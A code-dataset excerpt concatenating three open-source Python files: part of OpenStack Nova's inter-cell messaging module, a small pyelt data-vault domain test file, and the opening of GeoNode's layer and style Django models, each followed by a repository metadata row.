instance_fault.pop(key, None)
log_str = _("Got message to create instance fault: "
"%(instance_fault)s")
LOG.debug(log_str, {'instance_fault': instance_fault})
fault = instance_fault_obj.InstanceFault(context=message.ctxt)
fault.update(instance_fault)
fault.create()
def bw_usage_update_at_top(self, message, bw_update_info, **kwargs):
"""Update Bandwidth usage in the DB if we're a top level cell."""
if not self._at_the_top():
return
self.db.bw_usage_update(message.ctxt, **bw_update_info)
def _sync_instance(self, ctxt, instance):
if instance['deleted']:
self.msg_runner.instance_destroy_at_top(ctxt, instance)
else:
self.msg_runner.instance_update_at_top(ctxt, instance)
def sync_instances(self, message, project_id, updated_since, deleted,
**kwargs):
projid_str = project_id is None and "<all>" or project_id
since_str = updated_since is None and "<all>" or updated_since
LOG.info(_("Forcing a sync of instances, project_id="
"%(projid_str)s, updated_since=%(since_str)s"),
{'projid_str': projid_str, 'since_str': since_str})
if updated_since is not None:
updated_since = timeutils.parse_isotime(updated_since)
instances = cells_utils.get_instances_to_sync(message.ctxt,
updated_since=updated_since, project_id=project_id,
deleted=deleted)
for instance in instances:
self._sync_instance(message.ctxt, instance)
def service_get_all(self, message, filters):
if filters is None:
filters = {}
disabled = filters.pop('disabled', None)
services = self.db.service_get_all(message.ctxt, disabled=disabled)
ret_services = []
for service in services:
service = jsonutils.to_primitive(service)
for key, val in filters.iteritems():
if service[key] != val:
break
else:
ret_services.append(service)
return ret_services
def compute_node_get_all(self, message, hypervisor_match):
"""Return compute nodes in this cell."""
if hypervisor_match is not None:
nodes = self.db.compute_node_search_by_hypervisor(message.ctxt,
hypervisor_match)
else:
nodes = self.db.compute_node_get_all(message.ctxt)
return jsonutils.to_primitive(nodes)
def compute_node_stats(self, message):
"""Return compute node stats from this cell."""
return self.db.compute_node_statistics(message.ctxt)
def consoleauth_delete_tokens(self, message, instance_uuid):
"""Delete consoleauth tokens for an instance in API cells."""
if not self._at_the_top():
return
self.consoleauth_rpcapi.delete_tokens_for_instance(message.ctxt,
instance_uuid)
def bdm_update_or_create_at_top(self, message, bdm, create):
"""Create or update a block device mapping in API cells. If
create is True, only try to create. If create is None, try to
update but fall back to create. If create is False, only attempt
to update. This maps to nova-conductor's behavior.
"""
if not self._at_the_top():
return
items_to_remove = ['id']
for key in items_to_remove:
bdm.pop(key, None)
if create is None:
self.db.block_device_mapping_update_or_create(message.ctxt,
bdm,
legacy=False)
return
elif create is True:
self.db.block_device_mapping_create(message.ctxt, bdm,
legacy=False)
return
# Unfortunately this update call wants BDM ID... but we don't know
# what it is in this cell. Search for it.. try matching either
# device_name or volume_id.
dev_name = bdm['device_name']
vol_id = bdm['volume_id']
instance_bdms = self.db.block_device_mapping_get_all_by_instance(
message.ctxt, bdm['instance_uuid'])
for instance_bdm in instance_bdms:
if dev_name and instance_bdm['device_name'] == dev_name:
break
if vol_id and instance_bdm['volume_id'] == vol_id:
break
else:
LOG.warn(_("No match when trying to update BDM: %(bdm)s"),
dict(bdm=bdm))
return
self.db.block_device_mapping_update(message.ctxt,
instance_bdm['id'], bdm,
legacy=False)
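    # Summary of the create flag (mirrors nova-conductor semantics):
    #   create=True  -> block_device_mapping_create() only
    #   create=None  -> block_device_mapping_update_or_create()
    #   create=False -> look the BDM up by device_name or volume_id,
    #                   then block_device_mapping_update()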
def bdm_destroy_at_top(self, message, instance_uuid, device_name,
volume_id):
"""Destroy a block device mapping in API cells by device name
or volume_id. device_name or volume_id can be None, but not both.
"""
if not self._at_the_top():
return
if device_name:
self.db.block_device_mapping_destroy_by_instance_and_device(
message.ctxt, instance_uuid, device_name)
elif volume_id:
self.db.block_device_mapping_destroy_by_instance_and_volume(
message.ctxt, instance_uuid, volume_id)
def get_migrations(self, message, filters):
context = message.ctxt
return self.compute_api.get_migrations(context, filters)
_CELL_MESSAGE_TYPE_TO_MESSAGE_CLS = {'targeted': _TargetedMessage,
'broadcast': _BroadcastMessage,
'response': _ResponseMessage}
_CELL_MESSAGE_TYPE_TO_METHODS_CLS = {'targeted': _TargetedMessageMethods,
'broadcast': _BroadcastMessageMethods,
'response': _ResponseMessageMethods}
#
# Below are the public interfaces into this module.
#
class MessageRunner(object):
"""This class is the main interface into creating messages and
processing them.
    Public methods in this class are typically called by the CellsManager
    to create a new message and process it, with the exception of
    'message_from_json', which should be used by CellsDrivers to convert
a JSONified message it has received back into the appropriate Message
class.
Private methods are used internally when we need to keep some
'global' state. For instance, eventlet queues used for responses are
held in this class. Also, when a Message is process()ed above and
it's determined we should take action locally,
_process_message_locally() will be called.
When needing to add a new method to call in a Cell2Cell message,
define the new method below and also add it to the appropriate
MessageMethods class where the real work will be done.
"""
def __init__(self, state_manager):
self.state_manager = state_manager
cells_scheduler_cls = importutils.import_class(
CONF.cells.scheduler)
self.scheduler = cells_scheduler_cls(self)
self.response_queues = {}
self.methods_by_type = {}
self.our_name = CONF.cells.name
for msg_type, cls in _CELL_MESSAGE_TYPE_TO_METHODS_CLS.iteritems():
self.methods_by_type[msg_type] = cls(self)
self.serializer = objects_base.NovaObjectSerializer()
def _process_message_locally(self, message):
"""Message processing will call this when its determined that
the message should be processed within this cell. Find the
method to call based on the message type, and call it. The
caller is responsible for catching exceptions and returning
results to cells, if needed.
"""
methods = self.methods_by_type[message.message_type]
fn = getattr(methods, message.method_name)
return fn(message, **message.method_kwargs)
def _put_response(self, response_uuid, response):
"""Put a response into a response queue. This is called when
a _ResponseMessage is processed in the cell that initiated a
'call' to another cell.
"""
resp_queue = self.response_queues.get(response_uuid)
if not resp_queue:
# Response queue is gone. We must have restarted or we
# received a response after our timeout period.
return
resp_queue.put(response)
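    # Call/response flow in brief: the caller's _setup_response_queue()
    # keys an eventlet queue by the outgoing message's uuid; the remote
    # cell answers with a _ResponseMessage whose response_uuid is that
    # same uuid, and _put_response() drops the payload into the matching
    # queue to wake the waiter in _wait_for_json_responses().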
def _setup_response_queue(self, message):
"""Set up an eventlet queue to use to wait for replies.
Replies come back from the target cell as a _ResponseMessage
being sent back to the source.
"""
resp_queue = queue.Queue()
self.response_queues[message.uuid] = resp_queue
return resp_queue
def _cleanup_response_queue(self, message):
"""Stop tracking the response queue either because we're
done receiving responses, or we've timed out.
"""
try:
del self.response_queues[message.uuid]
except KeyError:
# Ignore if queue is gone already somehow.
pass
def _create_response_message(self, ctxt, direction, target_cell,
response_uuid, response_kwargs, **kwargs):
"""Create a ResponseMessage. This is used internally within
the nova.cells.messaging module.
"""
return _ResponseMessage(self, ctxt, 'parse_responses',
response_kwargs, direction, target_cell,
response_uuid, **kwargs)
def _get_migrations_for_cell(self, ctxt, cell_name, filters):
method_kwargs = dict(filters=filters)
message = _TargetedMessage(self, ctxt, 'get_migrations',
method_kwargs, 'down', cell_name,
need_response=True)
response = message.process()
if response.failure and isinstance(response.value[1],
exception.CellRoutingInconsistency):
return []
return [response]
def message_from_json(self, json_message):
"""Turns a message in JSON format into an appropriate Message
instance. This is called when cells receive a message from
another cell.
"""
message_dict = jsonutils.loads(json_message)
# Need to convert context back.
ctxt = message_dict['ctxt']
message_dict['ctxt'] = context.RequestContext.from_dict(ctxt)
# NOTE(comstud): We also need to re-serialize any objects that
# exist in 'method_kwargs'.
method_kwargs = message_dict['method_kwargs']
for k, v in method_kwargs.items():
method_kwargs[k] = self.serializer.deserialize_entity(
message_dict['ctxt'], v)
message_type = message_dict.pop('message_type')
message_cls = _CELL_MESSAGE_TYPE_TO_MESSAGE_CLS[message_type]
return message_cls(self, **message_dict)
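    # Round-trip sketch (assuming a valid context and runner): a message
    # serialized with msg.to_json() in one cell is rebuilt here in the
    # next cell via its 'message_type' key -- e.g. 'targeted' maps back
    # to _TargetedMessage -- with objects in method_kwargs deserialized.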
def ask_children_for_capabilities(self, ctxt):
"""Tell child cells to send us capabilities. This is typically
called on startup of the nova-cells service.
"""
child_cells = self.state_manager.get_child_cells()
for child_cell in child_cells:
message = _TargetedMessage(self, ctxt,
'announce_capabilities',
dict(), 'down', child_cell)
message.process()
def ask_children_for_capacities(self, ctxt):
"""Tell child cells to send us capacities. This is typically
called on startup of the nova-cells service.
"""
child_cells = self.state_manager.get_child_cells()
for child_cell in child_cells:
message = _TargetedMessage(self, ctxt, 'announce_capacities',
dict(), 'down', child_cell)
message.process()
def tell_parents_our_capabilities(self, ctxt):
"""Send our capabilities to parent cells."""
parent_cells = self.state_manager.get_parent_cells()
if not parent_cells:
return
my_cell_info = self.state_manager.get_my_state()
capabs = self.state_manager.get_our_capabilities()
LOG.debug("Updating parents with our capabilities: %(capabs)s",
{'capabs': capabs})
# We have to turn the sets into lists so they can potentially
# be json encoded when the raw message is sent.
for key, values in capabs.items():
capabs[key] = list(values)
method_kwargs = {'cell_name': my_cell_info.name,
'capabilities': capabs}
for cell in parent_cells:
message = _TargetedMessage(self, ctxt, 'update_capabilities',
method_kwargs, 'up', cell, fanout=True)
message.process()
def tell_parents_our_capacities(self, ctxt):
"""Send our capacities to parent cells."""
parent_cells = self.state_manager.get_parent_cells()
if not parent_cells:
return
my_cell_info = self.state_manager.get_my_state()
capacities = self.state_manager.get_our_capacities()
LOG.debug("Updating parents with our capacities: %(capacities)s",
{'capacities': capacities})
method_kwargs = {'cell_name': my_cell_info.name,
'capacities': capacities}
for cell in parent_cells:
message = _TargetedMessage(self, ctxt, 'update_capacities',
method_kwargs, 'up', cell, fanout=True)
message.process()
def build_instances(self, ctxt, target_cell, build_inst_kwargs):
"""Called by the cell scheduler to tell a child cell to build
instance(s).
"""
method_kwargs = dict(build_inst_kwargs=build_inst_kwargs)
message = _TargetedMessage(self, ctxt, 'build_instances',
method_kwargs, 'down', target_cell)
message.process()
def run_compute_api_method(self, ctxt, cell_name, method_info, call):
"""Call a compute API method in a specific cell."""
message = _TargetedMessage(self, ctxt, 'run_compute_api_method',
dict(method_info=method_info), 'down',
cell_name, need_response=call)
return message.process()
def instance_update_at_top(self, ctxt, instance):
"""Update an instance at the top level cell."""
message = _BroadcastMessage(self, ctxt, 'instance_update_at_top',
dict(instance=instance), 'up',
run_locally=False)
message.process()
def instance_destroy_at_top(self, ctxt, instance):
"""Destroy an instance at the top level cell."""
message = _BroadcastMessage(self, ctxt, 'instance_destroy_at_top',
dict(instance=instance), 'up',
run_locally=False)
message.process()
def instance_delete_everywhere(self, ctxt, instance, delete_type):
"""This is used by API cell when it didn't know what cell
an instance was in, but the instance was requested to be
deleted or soft_deleted. So, we'll broadcast this everywhere.
"""
method_kwargs = dict(instance=instance, delete_type=delete_type)
message = _BroadcastMessage(self, ctxt,
'instance_delete_everywhere',
method_kwargs, 'down',
run_locally=False)
message.process()
def instance_fault_create_at_top(self, ctxt, instance_fault):
"""Create an instance fault at the top level cell."""
message = _BroadcastMessage(self, ctxt,
'instance_fault_create_at_top',
dict(instance_fault=instance_fault),
'up', run_locally=False)
message.process()
def bw_usage_update_at_top(self, ctxt, bw_update_info):
"""Update bandwidth usage at top level cell."""
message = _BroadcastMessage(self, ctxt, 'bw_usage_update_at_top',
dict(bw_update_info=bw_update_info),
'up', run_locally=False)
message.process()
def sync_instances(self, ctxt, project_id, updated_since, deleted):
"""Force a sync of all instances, potentially by project_id,
and potentially since a certain date/time.
"""
method_kwargs = dict(project_id=project_id,
updated_since=updated_since,
deleted=deleted)
message = _BroadcastMessage(self, ctxt, 'sync_instances',
method_kwargs, 'down',
run_locally=False)
message.process()
def service_get_all(self, ctxt, filters=None):
method_kwargs = dict(filters=filters)
message = _BroadcastMessage(self, ctxt, 'service_get_all',
method_kwargs, 'down',
run_locally=True, need_response=True)
return message.process()
def service_get_by_compute_host(self, ctxt, cell_name, host_name):
method_kwargs = dict(host_name=host_name)
message = _TargetedMessage(self, ctxt,
'service_get_by_compute_host',
method_kwargs, 'down', cell_name,
need_response=True)
return message.process()
def get_host_uptime(self, ctxt, cell_name, host_name):
method_kwargs = dict(host_name=host_name)
message = _TargetedMessage(self, ctxt,
'get_host_uptime',
method_kwargs, 'down', cell_name,
need_response=True)
return message.process()
def service_update(self, ctxt, cell_name, host_name, binary,
params_to_update):
"""Used to enable/disable a service. For compute services, setting to
disabled stops new builds arriving on that host.
:param host_name: the name of the host machine that the service is
running
:param binary: The name of the executable that the service runs as
        :param params_to_update: e.g. {'disabled': True}
        :returns: the updated service object
"""
method_kwargs = dict(host_name=host_name, binary=binary,
params_to_update=params_to_update)
message = _TargetedMessage(self, ctxt,
'service_update',
method_kwargs, 'down', cell_name,
need_response=True)
return message.process()
def service_delete(self, ctxt, cell_name, service_id):
"""Deletes the specified service."""
method_kwargs = {'service_id': service_id}
message = _TargetedMessage(self, ctxt,
'service_delete',
method_kwargs, 'down', cell_name,
need_response=True)
message.process()
def proxy_rpc_to_manager(self, ctxt, cell_name, host_name, topic,
rpc_message, call, timeout):
method_kwargs = {'host_name': host_name,
'topic': topic,
'rpc_message': rpc_message,
'timeout': timeout}
message = _TargetedMessage(self, ctxt,
'proxy_rpc_to_manager',
method_kwargs, 'down', cell_name,
need_response=call)
return message.process()
def task_log_get_all(self, ctxt, cell_name, task_name,
period_beginning, period_ending,
host=None, state=None):
"""Get task logs from the DB from all cells or a particular
cell.
If 'cell_name' is None or '', get responses from all cells.
If 'host' is not None, filter by host.
If 'state' is not None, filter by state.
Return a list of Response objects.
"""
method_kwargs = dict(task_name=task_name,
period_beginning=period_beginning,
period_ending=period_ending,
host=host, state=state)
if cell_name:
message = _TargetedMessage(self, ctxt, 'task_log_get_all',
method_kwargs, 'down',
cell_name, need_response=True)
# Caller should get a list of Responses.
return [message.process()]
message = _BroadcastMessage(self, ctxt, 'task_log_get_all',
method_kwargs, 'down',
run_locally=True, need_response=True)
return message.process()
def compute_node_get_all(self, ctxt, hypervisor_match=None):
"""Return list of compute nodes in all child cells."""
method_kwargs = dict(hypervisor_match=hypervisor_match)
message = _BroadcastMessage(self, ctxt, 'compute_node_get_all',
method_kwargs, 'down',
run_locally=True, need_response=True)
return message.process()
def compute_node_stats(self, ctxt):
"""Return compute node stats from all child cells."""
method_kwargs = dict()
message = _BroadcastMessage(self, ctxt, 'compute_node_stats',
method_kwargs, 'down',
run_locally=True, need_response=True)
return message.process()
def compute_node_get(self, ctxt, cell_name, compute_id):
"""Return compute node entry from a specific cell by ID."""
method_kwargs = dict(compute_id=compute_id)
message = _TargetedMessage(self, ctxt, 'compute_node_get',
method_kwargs, 'down',
cell_name, need_response=True)
return message.process()
def actions_get(self, ctxt, cell_name, instance_uuid):
method_kwargs = dict(instance_uuid=instance_uuid)
message = _TargetedMessage(self, ctxt, 'actions_get',
method_kwargs, 'down',
cell_name, need_response=True)
return message.process()
def action_get_by_request_id(self, ctxt, cell_name, instance_uuid,
request_id):
method_kwargs = dict(instance_uuid=instance_uuid,
request_id=request_id)
message = _TargetedMessage(self, ctxt, 'action_get_by_request_id',
method_kwargs, 'down',
cell_name, need_response=True)
return message.process()
def action_events_get(self, ctxt, cell_name, action_id):
method_kwargs = dict(action_id=action_id)
message = _TargetedMessage(self, ctxt, 'action_events_get',
method_kwargs, 'down',
cell_name, need_response=True)
return message.process()
def consoleauth_delete_tokens(self, ctxt, instance_uuid):
"""Delete consoleauth tokens for an instance in API cells."""
message = _BroadcastMessage(self, ctxt, 'consoleauth_delete_tokens',
dict(instance_uuid=instance_uuid),
'up', run_locally=False)
message.process()
def validate_console_port(self, ctxt, cell_name, instance_uuid,
console_port, console_type):
"""Validate console port with child cell compute node."""
method_kwargs = {'instance_uuid': instance_uuid,
'console_port': console_port,
'console_type': console_type}
message = _TargetedMessage(self, ctxt, 'validate_console_port',
method_kwargs, 'down',
cell_name, need_response=True)
return message.process()
def bdm_update_or_create_at_top(self, ctxt, bdm, create=None):
"""Update/Create a BDM at top level cell."""
message = _BroadcastMessage(self, ctxt,
'bdm_update_or_create_at_top',
dict(bdm=bdm, create=create),
'up', run_locally=False)
message.process()
def bdm_destroy_at_top(self, ctxt, instance_uuid, device_name=None,
volume_id=None):
"""Destroy a BDM at top level cell."""
method_kwargs = dict(instance_uuid=instance_uuid,
device_name=device_name,
volume_id=volume_id)
message = _BroadcastMessage(self, ctxt, 'bdm_destroy_at_top',
method_kwargs,
'up', run_locally=False)
message.process()
def get_migrations(self, ctxt, cell_name, run_locally, filters):
"""Fetch all migrations applying the filters for a given cell or all
cells.
"""
method_kwargs = dict(filters=filters)
if cell_name:
return self._get_migrations_for_cell(ctxt, cell_name, filters)
message = _BroadcastMessage(self, ctxt, 'get_migrations',
method_kwargs, 'down',
run_locally=run_locally,
need_response=True)
return message.process()
def _instance_action(self, ctxt, instance, method, extra_kwargs=None,
need_response=False):
"""Call instance_<method> in correct cell for instance."""
cell_name = instance.cell_name
if not cell_name:
LOG.warn(_("No cell_name for %(method)s() from API"),
dict(method=method), instance=instance)
return
method_kwargs = {'instance': instance}
if extra_kwargs:
method_kwargs.update(extra_kwargs)
message = _TargetedMessage(self, ctxt, method, method_kwargs,
'down', cell_name,
need_response=need_response)
return message.process()
def instance_update_from_api(self, ctxt, instance,
expected_vm_state, expected_task_state,
admin_state_reset):
"""Update an instance object in its cell."""
cell_name = instance.cell_name
if not cell_name:
LOG.warn(_("No cell_name for instance update from API"),
instance=instance)
return
method_kwargs = {'instance': instance,
'expected_vm_state': expected_vm_state,
'expected_task_state': expected_task_state,
'admin_state_reset': admin_state_reset}
message = _TargetedMessage(self, ctxt, 'instance_update_from_api',
method_kwargs, 'down',
cell_name)
message.process()
def start_instance(self, ctxt, instance):
"""Start an instance in its cell."""
self._instance_action(ctxt, instance, 'start_instance')
def stop_instance(self, ctxt, instance, do_cast=True):
"""Stop an instance in its cell."""
if do_cast:
self._instance_action(ctxt, instance, 'stop_instance')
else:
return self._instance_action(ctxt, instance, 'stop_instance',
need_response=True)
def reboot_instance(self, ctxt, instance, reboot_type):
"""Reboot an instance in its cell."""
extra_kwargs = dict(reboot_type=reboot_type)
self._instance_action(ctxt, instance, 'reboot_instance',
extra_kwargs=extra_kwargs)
def suspend_instance(self, ctxt, instance):
"""Suspend an instance in its cell."""
self._instance_action(ctxt, instance, 'suspend_instance')
def resume_instance(self, ctxt, instance):
"""Resume an instance in its cell."""
self._instance_action(ctxt, instance, 'resume_instance')
def terminate_instance(self, ctxt, instance):
self._instance_action(ctxt, instance, 'terminate_instance')
def soft_delete_instance(self, ctxt, instance):
self._instance_action(ctxt, instance, 'soft_delete_instance')
def pause_instance(self, ctxt, instance):
"""Pause an instance in its cell."""
self._instance_action(ctxt, instance, 'pause_instance')
def unpause_instance(self, ctxt, instance):
"""Unpause an instance in its cell."""
self._instance_action(ctxt, instance, 'unpause_instance')
def resize_instance(self, ctxt, instance, flavor,
extra_instance_updates):
"""Resize an instance in its cell."""
extra_kwargs = dict(flavor=flavor,
extra_instance_updates=extra_instance_updates)
self._instance_action(ctxt, instance, 'resize_instance',
extra_kwargs=extra_kwargs)
def live_migrate_instance(self, ctxt, instance, block_migration,
disk_over_commit, host_name):
"""Live migrate an instance in its cell."""
extra_kwargs = dict(block_migration=block_migration,
disk_over_commit=disk_over_commit,
host_name=host_name)
self._instance_action(ctxt, instance, 'live_migrate_instance',
extra_kwargs=extra_kwargs)
def revert_resize(self, ctxt, instance):
"""Revert a resize for an instance in its cell."""
self._instance_action(ctxt, instance, 'revert_resize')
def confirm_resize(self, ctxt, instance):
"""Confirm a resize for an instance in its cell."""
self._instance_action(ctxt, instance, 'confirm_resize')
def reset_network(self, ctxt, instance):
"""Reset networking for an instance in its cell."""
self._instance_action(ctxt, instance, 'reset_network')
def inject_network_info(self, ctxt, instance):
"""Inject networking for an instance in its cell."""
self._instance_action(ctxt, instance, 'inject_network_info')
def snapshot_instance(self, ctxt, instance, image_id):
"""Snapshot an instance in its cell."""
extra_kwargs = dict(image_id=image_id)
self._instance_action(ctxt, instance, 'snapshot_instance',
extra_kwargs=extra_kwargs)
def backup_instance(self, ctxt, instance, image_id, backup_type,
rotation):
"""Backup an instance in its cell."""
extra_kwargs = dict(image_id=image_id, backup_type=backup_type,
rotation=rotation)
self._instance_action(ctxt, instance, 'backup_instance',
extra_kwargs=extra_kwargs)
def rebuild_instance(self, ctxt, instance, image_href, admin_password,
files_to_inject, preserve_ephemeral, kwargs):
extra_kwargs = dict(image_href=image_href,
admin_password=admin_password,
files_to_inject=files_to_inject,
preserve_ephemeral=preserve_ephemeral,
kwargs=kwargs)
self._instance_action(ctxt, instance, 'rebuild_instance',
extra_kwargs=extra_kwargs)
@staticmethod
def get_message_types():
return _CELL_MESSAGE_TYPE_TO_MESSAGE_CLS.keys()
class Response(object):
"""Holds a response from a cell. If there was a failure, 'failure'
will be True and 'response' will contain an encoded Exception.
"""
def __init__(self, cell_name, value, failure):
self.failure = failure
self.cell_name = cell_name
self.value = value
def to_json(self):
resp_value = self.value
if self.failure:
resp_value = serialize_remote_exception(resp_value,
log_failure=False)
_dict = {'cell_name': self.cell_name,
'value': resp_value,
'failure': self.failure}
return jsonutils.dumps(_dict)
@classmethod
def from_json(cls, json_message):
_dict = jsonutils.loads(json_message)
if _dict['failure']:
resp_value = deserialize_remote_exception(_dict['value'],
rpc.get_allowed_exmods())
_dict['value'] = resp_value
return cls(**_dict)
def value_or_raise(self):
if self.failure:
if isinstance(self.value, (tuple, list)):
raise self.value[0], self.value[1], self.value[2]
else:
raise self.value
return self.value
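# Illustrative sketch (not part of the original module): a minimal success-case
# round trip through Response.to_json()/from_json(). The cell name and value
# below are made-up placeholder data.
def _example_response_roundtrip():
    resp = Response('api!child', {'result': 42}, False)
    restored = Response.from_json(resp.to_json())
    assert restored.cell_name == 'api!child'
    assert restored.value_or_raise() == {'result': 42}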
_REMOTE_POSTFIX = '_Remote'
def serialize_remote_exception(failure_info, log_failure=True):
"""Prepares exception data to be sent over rpc.
Failure_info should be a sys.exc_info() tuple.
"""
tb = traceback.format_exception(*failure_info)
failure = failure_info[1]
if log_failure:
LOG.error(_("Returning exception %s to caller"),
six.text_type(failure))
LOG.error(tb)
kwargs = {}
if hasattr(failure, 'kwargs'):
kwargs = failure.kwargs
# NOTE(matiu): With cells, it's possible to re-raise remote, remote
    # exceptions. Let's turn it back into the original exception type.
cls_name = str(failure.__class__.__name__)
mod_name = str(failure.__class__.__module__)
if (cls_name.endswith(_REMOTE_POSTFIX) and
mod_name.endswith(_REMOTE_POSTFIX)):
cls_name = cls_name[:-len(_REMOTE_POSTFIX)]
mod_name = mod_name[:-len(_REMOTE_POSTFIX)]
data = {
'class': cls_name,
'module': mod_name,
'message': six.text_type(failure),
'tb': tb,
'args': failure.args,
'kwargs': kwargs
}
json_data = jsonutils.dumps(data)
return json_data
def deserialize_remote_exception(data, allowed_remote_exmods):
failure = jsonutils.loads(str(data))
trace = failure.get('tb', [])
message = failure.get('message', "") + "\n" + "\n".join(trace)
name = failure.get('class')
module = failure.get('module')
# NOTE(ameade): We DO NOT want to allow just any module to be imported, in
# order to prevent arbitrary code execution.
if module != 'exceptions' and module not in allowed_remote_exmods:
return messaging.RemoteError(name, failure.get('message'), trace)
try:
mod = importutils.import_module(module)
klass = getattr(mod, name)
if not issubclass(klass, Exception):
raise TypeError("Can only deserialize Exceptions")
failure = klass(*failure.get('args', []), **failure.get('kwargs', {}))
except (AttributeError, TypeError, ImportError):
return messaging.RemoteError(name, failure.get('message'), trace)
ex_type = type(failure)
str_override = lambda self: message
new_ex_type = type(ex_type.__name__ + _REMOTE_POSTFIX, (ex_type,),
{'__str__': str_override, '__unicode__': str_override})
new_ex_type.__module__ = '%s%s' % (module, _REMOTE_POSTFIX)
try:
# NOTE(ameade): Dynamically create a new exception type and swap it in
# as the new type for the exception. This only works on user defined
# Exceptions and not core python exceptions. This is important because
# we cannot necessarily change an exception message so we must override
# the __str__ method.
failure.__class__ = new_ex_type
except TypeError:
# NOTE(ameade): If a core exception then just add the traceback to the
# first exception argument.
failure.args = (message,) + failure.args[1:]
return failure
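# Illustrative sketch (not part of the original module): round-tripping an
# exception through the two helpers above. ValueError lives in the stdlib
# 'exceptions' module on Python 2, so deserialization always permits it.
def _example_exception_roundtrip():
    import sys
    try:
        raise ValueError('boom')
    except ValueError:
        payload = serialize_remote_exception(sys.exc_info(), log_failure=False)
    failure = deserialize_remote_exception(payload, allowed_remote_exmods=[])
    assert isinstance(failure, ValueError)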
|
afrolov1/nova
|
nova/cells/messaging.py
|
Python
|
apache-2.0
| 84,342 | 0.000628 |
from pyelt.datalayers.database import Column, Columns
from pyelt.datalayers.dv import Sat, DvEntity, Link, Hub, HybridSat, LinkReference
class Role:
pass
class Act:
pass
class Participation:
pass
class Zorgverlener(DvEntity, Role):
class Default(Sat):
zorgverlenernummer = Columns.TextColumn()
aanvangsdatum = Columns.DateColumn()
einddatum = Columns.DateColumn()
class Personalia(Sat):
achternaam = Columns.TextColumn()
tussenvoegsels = Columns.TextColumn()
voorletters = Columns.TextColumn()
voornaam = Columns.TextColumn()
bijnaam = Columns.TextColumn()
    # not used in dwh2.0; used here for the tests run in test03r_domain.py
class ContactGegevens(HybridSat):
class Types(HybridSat.Types):
telefoon = 'telefoon'
mobiel = 'mobiel'
mobiel2 = 'mobiel2'
telnummer = Columns.TextColumn()
datum = Columns.DateColumn()
landcode = Columns.TextColumn()
default = Default()
personalia = Personalia()
contactgegevens = ContactGegevens()
class Adres(DvEntity, Role):
class Default(Sat):
postcode = Columns.TextColumn()
huisnummer = Columns.IntColumn()
huisnummer_toevoeging = Columns.TextColumn()
straat = Columns.TextColumn()
plaats = Columns.TextColumn()
land = Columns.TextColumn()
default = Default()
class Zorginstelling(DvEntity, Role):
class Default(Sat):
zorginstellings_naam = Columns.TextColumn()
zorginstellings_nummer = Columns.TextColumn()
default = Default()
# This is a link:
class Zorgverlener_Zorginstelling_Link(Link, Participation):
zorgverlener = LinkReference(Zorgverlener)
zorginstelling = LinkReference(Zorginstelling)
# This is a HybridLink:
class Zorgverlener_Adres_Link(Link):
class Types:
post = 'post'
bezoek = 'bezoek'
woon = 'woon'
zorgverlener = LinkReference(Zorgverlener)
adres = LinkReference(Adres)
class Zorginstelling_Adres_Link(Link):
zorginstelling = LinkReference(Zorginstelling)
adres = LinkReference(Adres)
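# Illustrative sketch (not part of the original module): the hybrid sat and
# hybrid link types declared above are reachable as plain class attributes.
def _example_domain_usage():
    assert Zorgverlener.ContactGegevens.Types.telefoon == 'telefoon'
    assert Zorgverlener_Adres_Link.Types.post == 'post'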
|
NLHEALTHCARE/PYELT
|
tests/old/unit_tests_rob/_domain_rob_unittest.py
|
Python
|
gpl-3.0
| 2,194 | 0.001823 |
# -*- coding: utf-8 -*-
#########################################################################
#
# Copyright (C) 2012 OpenPlans
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#########################################################################
import uuid
import logging
from datetime import datetime
from django.db import models
from django.db.models import signals
from django.contrib.contenttypes.models import ContentType
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from geonode.base.models import ResourceBase, ResourceBaseManager, resourcebase_post_save
from geonode.people.utils import get_valid_user
from agon_ratings.models import OverallRating
logger = logging.getLogger("geonode.layers.models")
shp_exts = ['.shp', ]
csv_exts = ['.csv']
kml_exts = ['.kml']
vec_exts = shp_exts + csv_exts + kml_exts
cov_exts = ['.tif', '.tiff', '.geotiff', '.geotif']
class Style(models.Model):
"""Model for storing styles.
"""
name = models.CharField(_('style name'), max_length=255, unique=True)
sld_title = models.CharField(max_length=255, null=True, blank=True)
sld_body = models.TextField(_('sld text'), null=True, blank=True)
sld_version = models.CharField(
_('sld version'),
max_length=12,
null=True,
blank=True)
sld_url = models.CharField(_('sld url'), null=True, max_length=1000)
workspace = models.CharField(max_length=255, null=True, blank=True)
def __str__(self):
return "%s" % self.name.encode('utf-8')
class LayerManager(ResourceBaseManager):
def __init__(self):
models.Manager.__init__(self)
class Layer(ResourceBase):
"""
Layer (inherits ResourceBase fields)
"""
# internal fields
objects = LayerManager()
workspace = models.CharField(max_length=128)
store = models.CharField(max_length=128)
storeType = models.CharField(max_length=128)
name = models.CharField(max_length=128)
typename = models.CharField(max_length=128, null=True, blank=True)
default_style = models.ForeignKey(
Style,
related_name='layer_default_style',
null=True,
blank=True)
styles = models.ManyToManyField(Style, related_name='layer_styles')
charset = models.CharField(max_length=255, default='UTF-8')
upload_session = models.ForeignKey('UploadSession', blank=True, null=True)
service = models.ForeignKey(
'services.Service',
null=True,
blank=True,
related_name='layer_set')
def is_vector(self):
return self.storeType == 'dataStore'
@property
def display_type(self):
return ({
"dataStore": "Vector Data",
"coverageStore": "Raster Data",
}).get(self.storeType, "Data")
@property
def data_model(self):
if hasattr(self, 'modeldescription_set'):
lmd = self.modeldescription_set.all()
if lmd.exists():
return lmd.get().get_django_model()
return None
@property
def data_objects(self):
if self.data_model is not None:
return self.data_model.objects.using('datastore')
return None
@property
def service_type(self):
if self.storeType == 'coverageStore':
return "WCS"
if self.storeType == 'dataStore':
return "WFS"
@property
def ows_url(self):
if self.storeType == "remoteStore":
return self.service.base_url
else:
return settings.OGC_SERVER['default']['PUBLIC_LOCATION'] + "wms"
@property
def ptype(self):
if self.storeType == "remoteStore":
return self.service.ptype
else:
return "gxp_wmscsource"
@property
def service_typename(self):
if self.storeType == "remoteStore":
return "%s:%s" % (self.service.name, self.typename)
else:
return self.typename
def get_base_file(self):
"""Get the shp or geotiff file for this layer.
"""
# If there was no upload_session return None
if self.upload_session is None:
return None
base_exts = [x.replace('.', '') for x in cov_exts + vec_exts]
